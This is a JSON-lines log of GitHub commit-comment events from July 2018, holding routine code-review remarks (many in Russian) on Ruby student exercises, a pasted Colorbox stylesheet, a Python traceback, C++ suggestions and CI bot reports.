{"id":"7935399296","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29636435,"position":null,"line":null,"path":null,"commit_id":"9c9bbb00bd6816138c7f266b674540e44b0bc0ee","created_at":"2018-07-09T04:54:16Z","updated_at":"2018-07-09T04:54:16Z","author_association":"NONE","body":"Not used by a6k"}},"created_at":"2018-07-09T04:54:16Z"}
{"id":"7935400786","type":"CommitCommentEvent","actor":{"login":"xcguang"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29636438,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T04:54:57Z","updated_at":"2018-07-09T04:54:57Z","author_association":"NONE","body":"@kriegste Yes, it can work for SSL conenctions and WPA2 enterprise. \r\nWe modified the action of os_malloc,  and the os_malloc_dram is the same as os_malloc in the old version, the os_malloc is allocated from iram, which is added in the commit."}},"created_at":"2018-07-09T04:54:57Z"}
{"id":"7935403769","type":"CommitCommentEvent","actor":{"login":"straw1105"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29636442,"position":null,"line":null,"path":null,"commit_id":"31ed78587e3b5a32fcb0566b64cef79d48e4bc5e","created_at":"2018-07-09T04:56:20Z","updated_at":"2018-07-09T04:56:20Z","author_association":"CONTRIBUTOR","body":"@马考山   您好 我想要恢复到原先没修改的状态 "}},"created_at":"2018-07-09T04:56:20Z"}
{"id":"7935404374","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636443,"position":91,"line":91,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:56:37Z","updated_at":"2018-07-09T04:56:37Z","author_association":"NONE","body":"вот этот вызов у тебя спровоцирует многократное создание раундов из себя\r\nя тебе уже писал про это\r\nу тебя первый Раунд где создается ?\r\nв МайГейм, и это правильно\r\nтак вот после окончания раунда программа туда же и должна вернуться\r\nв метод `run` класса МайГейм\r\nи уже там нужно запускать диалог, хочет ли юзер играть еще раз\r\nесли хочет, то снова создавать раунд и все по новой\r\nлучше всего это реализовать через петлю\r\nо чем я тебе тоже писал\r\nт.е. в МайГейм в методе \"ран\" должна быть петля, которая прерывается, если пользователь не хочет играть и повторяется, если хочет\r\n"}},"created_at":"2018-07-09T04:56:37Z"}
{"id":"7935405033","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636445,"position":23,"line":16,"path":"my_game.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:56:55Z","updated_at":"2018-07-09T04:56:55Z","author_association":"NONE","body":"этот метод должен быть приватным"}},"created_at":"2018-07-09T04:56:55Z"}
{"id":"7935407518","type":"CommitCommentEvent","actor":{"login":"Jayanth-kumar5566"},"repo":{"name":"Jayanth-kumar5566/ML_OMICS"},"payload":{"comment":{"id":29636450,"position":null,"line":null,"path":null,"commit_id":"1b28e03776f10567a4b78731d433ae87625f4fff","created_at":"2018-07-09T04:58:07Z","updated_at":"2018-07-09T04:58:07Z","author_association":"OWNER","body":"Sorry its clustering not correlation "}},"created_at":"2018-07-09T04:58:07Z"}
{"id":"7935410558","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636459,"position":null,"line":null,"path":null,"commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:59:32Z","updated_at":"2018-07-09T04:59:32Z","author_association":"NONE","body":"Тебе в тесте надо как то парсить что выводиться на косоль и асертить\r\nПочитай тут\r\nhttps://coderanch.com/t/587280/java/assertEquals-println"}},"created_at":"2018-07-09T04:59:32Z"}
{"id":"7935411195","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29636463,"position":20,"line":20,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-09T04:59:48Z","updated_at":"2018-07-09T04:59:48Z","author_association":"OWNER","body":"aaa yasno sps teper ponyal v hem moya oshybka ispravil "}},"created_at":"2018-07-09T04:59:48Z"}
{"id":"7935411241","type":"CommitCommentEvent","actor":{"login":"masonk"},"repo":{"name":"stepancheg/rust-protobuf"},"payload":{"comment":{"id":29636464,"position":null,"line":null,"path":null,"commit_id":"ce7a84f08f7a3acba10d04fd5b2c7addf62163e9","created_at":"2018-07-09T04:59:50Z","updated_at":"2018-07-09T04:59:50Z","author_association":"NONE","body":"Do you have any idea when you're going to publish 3.0?  I'm looking forward to using the text parsing. And, thanks for this great crate."}},"created_at":"2018-07-09T04:59:50Z"}
{"id":"7935412912","type":"CommitCommentEvent","actor":{"login":"yisumi"},"repo":{"name":"yisumi/crawler"},"payload":{"comment":{"id":29636472,"position":25,"line":25,"path":"paiwei.py","commit_id":"0753e40febf0de45d4c530e0f567ddf806d9462d","created_at":"2018-07-09T05:00:27Z","updated_at":"2018-07-09T05:00:27Z","author_association":"OWNER","body":"this is a comment"}},"created_at":"2018-07-09T05:00:27Z"}
{"id":"7935414215","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29636476,"position":24,"line":24,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-09T05:01:00Z","updated_at":"2018-07-09T05:01:00Z","author_association":"OWNER","body":"eot method vozvrashaet poezda po tipu gruzovoi ili passazhyrski....tut tozhe ispravil izmenil ymya methoda i sintaksis"}},"created_at":"2018-07-09T05:01:00Z"}
{"id":"7935415443","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29636478,"position":26,"line":26,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-09T05:01:30Z","updated_at":"2018-07-09T05:01:30Z","author_association":"OWNER","body":"vozvrashaet po tipu ispravil sintaksis "}},"created_at":"2018-07-09T05:01:30Z"}
{"id":"7935415866","type":"CommitCommentEvent","actor":{"login":"sy07"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29636480,"position":null,"line":null,"path":null,"commit_id":"8a852d11f4f8eb95b9f57e296fefb25bc0acd21b","created_at":"2018-07-09T05:01:41Z","updated_at":"2018-07-09T05:01:41Z","author_association":"NONE","body":"Can anyone tell me how to add AddNameToMembershipType.Designer.cs and AddNameToMembership.resx ?\r\nI am new to MVC "}},"created_at":"2018-07-09T05:01:41Z"}
{"id":"7935419376","type":"CommitCommentEvent","actor":{"login":"kotachang"},"repo":{"name":"dvirhilu10/ENPH253_2018_Team10"},"payload":{"comment":{"id":29636490,"position":null,"line":null,"path":null,"commit_id":"cd8b45c9d94bb1adcb898ced8acb03119cf934b4","created_at":"2018-07-09T05:03:17Z","updated_at":"2018-07-09T05:03:17Z","author_association":"COLLABORATOR","body":"Place it in a \"BinState\" folder inside Arduino Libraries folder "}},"created_at":"2018-07-09T05:03:17Z"}
{"id":"7935419416","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29636491,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T05:03:18Z","updated_at":"2018-07-09T05:03:18Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2931 of 2931 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T05:03:18Z"}
{"id":"7935428790","type":"CommitCommentEvent","actor":{"login":"jpduckwo"},"repo":{"name":"angular/material2"},"payload":{"comment":{"id":29636503,"position":null,"line":null,"path":null,"commit_id":"50ea837250b8d65de257510febf95756cfe7af52","created_at":"2018-07-09T05:07:36Z","updated_at":"2018-07-09T05:07:36Z","author_association":"NONE","body":"I think this broke the menu appearing on small screens sometimes... "}},"created_at":"2018-07-09T05:07:36Z"}
{"id":"7935440330","type":"CommitCommentEvent","actor":{"login":"Akash98Sky"},"repo":{"name":"Amitava123/rom_building_system_setup"},"payload":{"comment":{"id":29636518,"position":10,"line":10,"path":"env_setup.cpp","commit_id":"516b4edd32fff5cf6b6e7e3c61cd79405ebff27f","created_at":"2018-07-09T05:12:57Z","updated_at":"2018-07-09T05:12:57Z","author_association":"NONE","body":"No file opened in fin stream"}},"created_at":"2018-07-09T05:12:57Z"}
{"id":"7935442308","type":"CommitCommentEvent","actor":{"login":"todorone"},"repo":{"name":"rebeccahughes/react-native-device-info"},"payload":{"comment":{"id":29636521,"position":null,"line":null,"path":null,"commit_id":"3d45ba54a4100c6dda826d77d88f72c71caada16","created_at":"2018-07-09T05:13:50Z","updated_at":"2018-07-09T05:13:50Z","author_association":"NONE","body":"@machour May i ask You what's the reason behind this rolling back? Now we can't just add one line to `Podfile` to set up library for iOS because of React dependency conflict."}},"created_at":"2018-07-09T05:13:50Z"}
{"id":"7935443879","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29636523,"position":6,"line":45,"path":"tests/test_hintfonts.py","commit_id":"93103c08ca2c24664fb6ff20e19f827dee7c1f55","created_at":"2018-07-09T05:14:30Z","updated_at":"2018-07-09T05:14:30Z","author_association":"MEMBER","body":"done #1290"}},"created_at":"2018-07-09T05:14:30Z"}
{"id":"7935446946","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636530,"position":9,"line":9,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T05:15:49Z","updated_at":"2018-07-09T05:15:49Z","author_association":"NONE","body":"и правильней будет переписать этот код, а также код в строках 96, 101, 106, 107\r\nидея в следующем - вынести все методы работы с деньгами в класс Банк\r\nт.е. переписать надо примерно в таком стиле\r\n8 строку из `@dealer.make_bet(@bank)` превратить во что-то типа: `@bank.take_bet(@dealer)`\r\nну и так далее...\r\nв итоге надо поправить код здесь, в классе Игрок убрать пару методов, в классе Банк добавить"}},"created_at":"2018-07-09T05:15:49Z"}
{"id":"7935454313","type":"CommitCommentEvent","actor":{"login":"jpduckwo"},"repo":{"name":"angular/material2"},"payload":{"comment":{"id":29636537,"position":null,"line":null,"path":null,"commit_id":"50ea837250b8d65de257510febf95756cfe7af52","created_at":"2018-07-09T05:18:58Z","updated_at":"2018-07-09T05:18:58Z","author_association":"NONE","body":"On a small screen, if the menu item width is oversize (ie would be truncated) then menu items on the right hand size of the small screen would trigger open but could not be seen. However switching back to desktop width lets you see it."}},"created_at":"2018-07-09T05:18:58Z"}
{"id":"7935454889","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29636540,"position":null,"line":null,"path":null,"commit_id":"fe6851a2d5fa2d0ea7ad21d9969bae6698f32505","created_at":"2018-07-09T05:19:13Z","updated_at":"2018-07-09T05:19:13Z","author_association":"CONTRIBUTOR","body":"This also seems to have broken wicat rather badly. My attempted crude workaround only got the driver working again so far as the beginning of \"Memory test.\""}},"created_at":"2018-07-09T05:19:13Z"}
{"id":"7935456983","type":"CommitCommentEvent","actor":{"login":"avoidwork"},"repo":{"name":"avoidwork/tenso"},"payload":{"comment":{"id":29636543,"position":5,"line":592,"path":"lib/utility.js","commit_id":"1326fccf64015ffae54bfe68be8d5085374b9b17","created_at":"2018-07-09T05:20:05Z","updated_at":"2018-07-09T05:20:05Z","author_association":"OWNER","body":"diminishing returns."}},"created_at":"2018-07-09T05:20:05Z"}
{"id":"7935459563","type":"CommitCommentEvent","actor":{"login":"ZhipeiLiu"},"repo":{"name":"ZhipeiLiu/ss-panel-and-ss-py-mu"},"payload":{"comment":{"id":29636551,"position":null,"line":null,"path":null,"commit_id":"85d01f3cb79409dd094338a39635725caabf7803","created_at":"2018-07-09T05:21:08Z","updated_at":"2018-07-09T05:21:08Z","author_association":"OWNER","body":"![wechatimg1](https://user-images.githubusercontent.com/25544152/42431943-e9bdce56-837a-11e8-831e-7f8b19311fe5.jpeg)\r\n"}},"created_at":"2018-07-09T05:21:08Z"}
{"id":"7935460214","type":"CommitCommentEvent","actor":{"login":"lebleut"},"repo":{"name":"lebleut/Tooltipy-OOP"},"payload":{"comment":{"id":29636556,"position":null,"line":null,"path":null,"commit_id":"a7d24b0cbcdfd86607688659357e9adbef94ebf1","created_at":"2018-07-09T05:21:23Z","updated_at":"2018-07-09T05:21:23Z","author_association":"OWNER","body":"Here starts the content filtering to show highlight tooltips on the content"}},"created_at":"2018-07-09T05:21:23Z"}
{"id":"7935461659","type":"CommitCommentEvent","actor":{"login":"pinktimes"},"repo":{"name":"DPortillo821/conversation-analyzer"},"payload":{"comment":{"id":29636559,"position":null,"line":null,"path":null,"commit_id":"54c303f58e13ea6022a43fdfa0b1f0bfb382b074","created_at":"2018-07-09T05:22:02Z","updated_at":"2018-07-09T05:22:02Z","author_association":"COLLABORATOR","body":"1. What is this? I don't understand those numbers and alphabets\r\n    REGEX_PATTERN_2 = '([0-9]{1,2} [A-Z]{1}[a-z]+ [0-9]{4} at [0-9]{1,2}:[0-9]{2} [A-Z]{2}), ([A-Za-z0-9]+) : ([A-Za-z\\\\s\\\\W]+)' \r\n\r\n2. def __init__(self, conversation_file): \r\n  So .. I guess this function is reading user's conversation .txt files?\r\n\r\n3. To parse the .txt file,\r\n  def parse_conversation(self): read .txt line by line and save them to list 'line'?\r\n this While part is running until line has no information. \r\n We are finding regex_groups by searching REGEX_PATTERNS_2 in 'line'. I suppose we have to define regex_pattern ? We are using regex_pattern from else where, so we should use 'self.REGEX_PATTERN2' instead of just REGEX_PATTERN_2?\r\ndatetime_message = datetime.strptime(regex_groups.group(1), '%d %B %Y at %I:%M %p')  \r\ndate_at_time_datetime = datetime.strptime(regex_groups.group(1), '%d %B %Y at %I:%M %p')  \r\nwhat is those &B, &I, &p? I think d is for day, Y is for year, M is for month..\r\nI don't understand how those codes below these. What is regex_group.group(2) and (3)?\r\nand \r\nif (user not in self.users): \r\n    self.users.append(user)  \r\nIn this code, users name have to be user? always?\r\n\r\n4. Do I have to understand do_describe and do_quit part?\r\n\r\n5. Why did you erased =message part and add this?\r\nself.conversation_dict[year][month][day][hour][minute][user].append(message) \r\nconversation_dict is a dictionary type, but append is used in list type.\r\n\r\n"}},"created_at":"2018-07-09T05:22:02Z"}
{"id":"7935463604","type":"CommitCommentEvent","actor":{"login":"originstudio"},"repo":{"name":"originstudio/works"},"payload":{"comment":{"id":29636564,"position":null,"line":null,"path":null,"commit_id":"52de2fc20c77b0784aa0285a1ae58f346e3de732","created_at":"2018-07-09T05:22:54Z","updated_at":"2018-07-09T05:22:54Z","author_association":"OWNER","body":"/*\r\n    Colorbox Core Style:\r\n    The following CSS is consistent between example themes and should not be altered.\r\n*/\r\n#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}\r\n#cboxWrapper {max-width:none;}\r\n#cboxOverlay{position:fixed; width:100%; height:100%;}\r\n#cboxMiddleLeft, #cboxBottomLeft{clear:left;}\r\n#cboxContent{position:relative;}\r\n#cboxLoadedContent{overflow:auto; -webkit-overflow-scrolling: touch; }\r\n#cboxTitle{margin:0;}\r\n#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%; height:100%;}\r\n#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}\r\n.cboxPhoto{float:left; margin:auto; border:0; display:block; max-width:none; -ms-interpolation-mode:bicubic;}\r\n.cboxIframe{width:100%; height:100%; display:block; border:0; padding:0; margin:0;}\r\n#colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box; -moz-box-sizing:content-box; -webkit-box-sizing:content-box;}\r\n/* \r\n    User Style:\r\n    Change the following styles to modify the appearance of Colorbox.  They are\r\n    ordered & tabbed in a way that represents the nesting of the generated HTML.\r\n*/\r\n#cboxOverlay{background:#000;}\r\n#colorbox{outline:0;}\r\n    #cboxTopLeft{width:25px; height:25px; background:url(../images/border1.png) no-repeat 0 0;}\r\n    #cboxTopCenter{height:25px; background:url(../images/border1.png) repeat-x 0 -50px;}\r\n    #cboxTopRight{width:25px; height:25px; background:url(../images/border1.png) no-repeat -25px 0;}\r\n    #cboxBottomLeft{width:25px; height:25px; background:url(../images/border1.png) no-repeat 0 -25px;}\r\n    #cboxBottomCenter{height:25px; background:url(../images/border1.png) repeat-x 0 -75px;}\r\n    #cboxBottomRight{width:25px; height:25px; background:url(../images/border1.png) no-repeat -25px -25px;}\r\n    #cboxMiddleLeft{width:25px; background:url(../images/border2.png) repeat-y 0 0;}\r\n    #cboxMiddleRight{width:25px; background:url(../images/border2.png) repeat-y -25px 0;}\r\n    #cboxContent{background:#fff; overflow:hidden;}\r\n        .cboxIframe{background:#fff;}\r\n        #cboxError{padding:50px; border:1px solid #ccc;}\r\n        #cboxLoadedContent{\r\nmargin-bottom: 10px;\r\n}\r\n        #cboxTitle{position:absolute; bottom:0px; left:0; text-align:center; width:100%; color:#999;}\r\n        #cboxCurrent{position:absolute; bottom:0px; left:100px; color:#999;}\r\n        #cboxLoadingOverlay{background:#fff url(../images/loading.gif) no-repeat 5px 5px;}\r\n        /* these elements are buttons, and may need to have additional styles reset to avoid unwanted base styles */\r\n        #cboxPrevious, #cboxNext, #cboxSlideshow, #cboxClose {border:0; padding:0; margin:0; overflow:visible; width:auto; background:none; }\r\n        \r\n        /* avoid outlines on :active (mouseclick), but preserve outlines on :focus (tabbed navigating) */\r\n        #cboxPrevious:active, #cboxNext:active, #cboxSlideshow:active, #cboxClose:active {outline:0;}\r\n        #cboxSlideshow{position:absolute; bottom:0px; right:42px; color:#444;}\r\n        #cboxPrevious{position:absolute; bottom:0px; left:0; color:#444;}\r\n        #cboxNext{position:absolute; bottom:0px; left:63px; color:#444;}\r\n        #cboxClose{position:absolute; top:0; right:10px; display:block; color:#444;font-size:30px;content:'x';}\r\n        #cboxClose:hover{color:red;}\r\n/*\r\n  The following fixes a problem where IE7 and IE8 replace a PNG's alpha transparency with a black fill\r\n  when an alpha filter (opacity change) is set on the element or ancestor element.  This style is not applied to or needed in IE9.\r\n  See: http://jacklmoore.com/notes/ie-transparency-problems/\r\n*/\r\n.cboxIE #cboxTopLeft,\r\n.cboxIE #cboxTopCenter,\r\n.cboxIE #cboxTopRight,\r\n.cboxIE #cboxBottomLeft,\r\n.cboxIE #cboxBottomCenter,\r\n.cboxIE #cboxBottomRight,\r\n.cboxIE #cboxMiddleLeft,\r\n.cboxIE #cboxMiddleRight {\r\n    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#00FFFFFF,endColorstr=#00FFFFFF);\r\n}\r\n"}},"created_at":"2018-07-09T05:22:54Z"}
{"id":"7935478486","type":"CommitCommentEvent","actor":{"login":"pinktimes"},"repo":{"name":"DPortillo821/conversation-analyzer"},"payload":{"comment":{"id":29636592,"position":null,"line":null,"path":null,"commit_id":"45df08753f013191b42ba446ea6a10ffe6912991","created_at":"2018-07-09T05:29:10Z","updated_at":"2018-07-09T05:29:10Z","author_association":"COLLABORATOR","body":"What do you mean validate number of args? what is argv[1]? \r\nprompt.intro,ruler,prompt,cmdloop\r\n-> these are executing during conversation_analyzer? What are the roles they are doing?"}},"created_at":"2018-07-09T05:29:10Z"}
{"id":"7935480151","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636596,"position":3,"line":2,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:29:51Z","updated_at":"2018-07-09T05:29:51Z","author_association":"NONE","body":"аааа ))) вижу предыдуший комментарий Влада )))... видимо он с телефона проверял....)))"}},"created_at":"2018-07-09T05:29:51Z"}
{"id":"7935481204","type":"CommitCommentEvent","actor":{"login":"zhouxiaoming123"},"repo":{"name":"zhouxiaoming123/project-name"},"payload":{"comment":{"id":29636599,"position":null,"line":null,"path":null,"commit_id":"ea59bbd53b0b51fb2eab24faec7d254866355710","created_at":"2018-07-09T05:30:15Z","updated_at":"2018-07-09T05:30:15Z","author_association":"OWNER","body":"我"}},"created_at":"2018-07-09T05:30:15Z"}
{"id":"7935485941","type":"CommitCommentEvent","actor":{"login":"laserljy"},"repo":{"name":"laserljy/TensorFlow_SimpleTask"},"payload":{"comment":{"id":29636611,"position":null,"line":null,"path":null,"commit_id":"b50d8845a4c05d98fe026b6ed92e1a611d74e436","created_at":"2018-07-09T05:32:06Z","updated_at":"2018-07-09T05:32:06Z","author_association":"OWNER","body":"The initial cost is around 19000 and will reach the minimum around 7000\r\nThe total cost will be around 600,000"}},"created_at":"2018-07-09T05:32:06Z"}
{"id":"7935487504","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636613,"position":41,"line":20,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:32:44Z","updated_at":"2018-07-09T05:32:44Z","author_association":"NONE","body":"ТЗ: \"Может удалять промежуточную станцию из списка\"\r\nтвой код удалит любую станцию из списка"}},"created_at":"2018-07-09T05:32:44Z"}
{"id":"7935488008","type":"CommitCommentEvent","actor":{"login":"frohoff"},"repo":{"name":"jaymoulin/google-music-manager"},"payload":{"comment":{"id":29636614,"position":5,"line":41,"path":"uploader/google_music_manager_uploader/uploader_daemon.py","commit_id":"55b8e895db15aa14e88251f122269086db0053ff","created_at":"2018-07-09T05:32:57Z","updated_at":"2018-07-09T05:32:57Z","author_association":"NONE","body":"Perhaps this `401` conditional should be removed? Currently seems to cause this:\r\n\r\n```\r\nraceback (most recent call last):\r\n  File \"/usr/local/bin/google-music-upload\", line 7, in <module>\r\n    from google_music_manager_uploader.uploader_daemon import main\r\n  File \"/usr/local/lib/python3.6/site-packages/google_music_manager_uploader/__init__.py\", line 5, in <module>\r\n    from .uploader_daemon import upload\r\n  File \"/usr/local/lib/python3.6/site-packages/google_music_manager_uploader/uploader_daemon.py\", line 42\r\n    elif \"502\" in error_message:\r\n       ^\r\nIndentationError: expected an indented block\r\n```"}},"created_at":"2018-07-09T05:32:57Z"}
{"id":"7935492817","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636624,"position":38,"line":17,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:35:00Z","updated_at":"2018-07-09T05:35:00Z","author_association":"NONE","body":"эти проверки не имеют смысла, если объекта нет, его просто не удалит метод `delete`\r\nи вернет `nil`\r\nесли проверки не пройдут произойдет то же самое\r\nтак зачем лишний код?\r\nвот смотри:\r\n```\r\n$ irb\r\n2.5.1 :001 > ar = [1, 2, 3]\r\n => [1, 2, 3] \r\n2.5.1 :002 > ar.delete(5)\r\n => nil \r\n2.5.1 :003 > ar.delete('a')\r\n => nil \r\n2.5.1 :004 >\r\n```\r\n"}},"created_at":"2018-07-09T05:35:00Z"}
{"id":"7935494342","type":"CommitCommentEvent","actor":{"login":"vikasrohit"},"repo":{"name":"appirio-tech/connect-app"},"payload":{"comment":{"id":29636627,"position":null,"line":null,"path":null,"commit_id":"048e08934e3f72d19ed365da5df83806a5bd133a","created_at":"2018-07-09T05:35:38Z","updated_at":"2018-07-09T05:35:38Z","author_association":"CONTRIBUTOR","body":"Good catch @maxceem. Thanks!!!"}},"created_at":"2018-07-09T05:35:38Z"}
{"id":"7935496770","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636636,"position":48,"line":26,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:36:39Z","updated_at":"2018-07-09T05:36:39Z","author_association":"NONE","body":"подумай, что в задании может означать вот эта фраза: \"Имеет начальную и конечную станцию\""}},"created_at":"2018-07-09T05:36:39Z"}
{"id":"7935497776","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636639,"position":5,"line":29,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.h","commit_id":"d797373e1d6ceb54defcfb3752f83a945d25f799","created_at":"2018-07-09T05:37:05Z","updated_at":"2018-07-09T05:37:05Z","author_association":"CONTRIBUTOR","body":"Have you considered switching from the __attribute syntax for only clang compilers, to the [[attribute]] syntax? That'd be compiler independent and I imagine would probably work the same with your clang based tooling as is.\r\n\r\nCompilers that don't recognize an attribute are supposed to ignore it without issuing a diagnostic, if i recall correctly."}},"created_at":"2018-07-09T05:37:05Z"}
{"id":"7935502876","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"UramnOIL/LevelSystem"},"payload":{"comment":{"id":29636651,"position":null,"line":null,"path":null,"commit_id":"e49ea5eb6d35978eaa4d9fcd213a9aa955eb69c0","created_at":"2018-07-09T05:39:05Z","updated_at":"2018-07-09T05:39:05Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, and the build was created with the following warnings:\n\n1. Sanitized project name, from \"0\" to \"0\"\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T05:39:05Z"}
{"id":"7935503989","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636653,"position":1,"line":11,"path":"Source/Foundation/bsfCore/Animation/BsSkeleton.cpp","commit_id":"7b3dc2d43452acd5b03fab6c5dd99de42d658b4d","created_at":"2018-07-09T05:39:31Z","updated_at":"2018-07-09T05:39:31Z","author_association":"CONTRIBUTOR","body":"= default; for the constructor declaration?"}},"created_at":"2018-07-09T05:39:31Z"}
{"id":"7935505820","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636660,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:40:16Z","updated_at":"2018-07-09T05:40:16Z","author_association":"NONE","body":"не принято писать скобки вокруг аргументов макросов типа `attr_reader`\r\nздесь более верным (рубишным) синтаксисом будет `attr_reader :trains, :name, :trains_count`"}},"created_at":"2018-07-09T05:40:16Z"}
{"id":"7935507468","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636666,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:40:58Z","updated_at":"2018-07-09T05:40:58Z","author_association":"NONE","body":"и конечно же поменяй `TrainS` на `trains` ))) \r\nсм. коммент в классе Роут"}},"created_at":"2018-07-09T05:40:58Z"}
{"id":"7935508496","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636668,"position":1,"line":11,"path":"Source/Foundation/bsfCore/Animation/BsSkeleton.cpp","commit_id":"7b3dc2d43452acd5b03fab6c5dd99de42d658b4d","created_at":"2018-07-09T05:41:23Z","updated_at":"2018-07-09T05:41:23Z","author_association":"CONTRIBUTOR","body":"The move constructor 40 lines below is also a good candidate for std::exchange."}},"created_at":"2018-07-09T05:41:23Z"}
{"id":"7935509620","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636671,"position":40,"line":16,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:41:52Z","updated_at":"2018-07-09T05:41:52Z","author_association":"NONE","body":"как и с удалением станции из маршрута, здесь проверки не имеют смысла"}},"created_at":"2018-07-09T05:41:52Z"}
{"id":"7935509651","type":"CommitCommentEvent","actor":{"login":"baron-zhang-avepoint"},"repo":{"name":"AvePoint/cloud-governance-samples"},"payload":{"comment":{"id":29636672,"position":null,"line":null,"path":null,"commit_id":"24d0fa00580b218926b9359cd4bbe3c8a00c7dbe","created_at":"2018-07-09T05:41:52Z","updated_at":"2018-07-09T05:41:52Z","author_association":"COLLABORATOR","body":"The coding style about AvePoint"}},"created_at":"2018-07-09T05:41:52Z"}
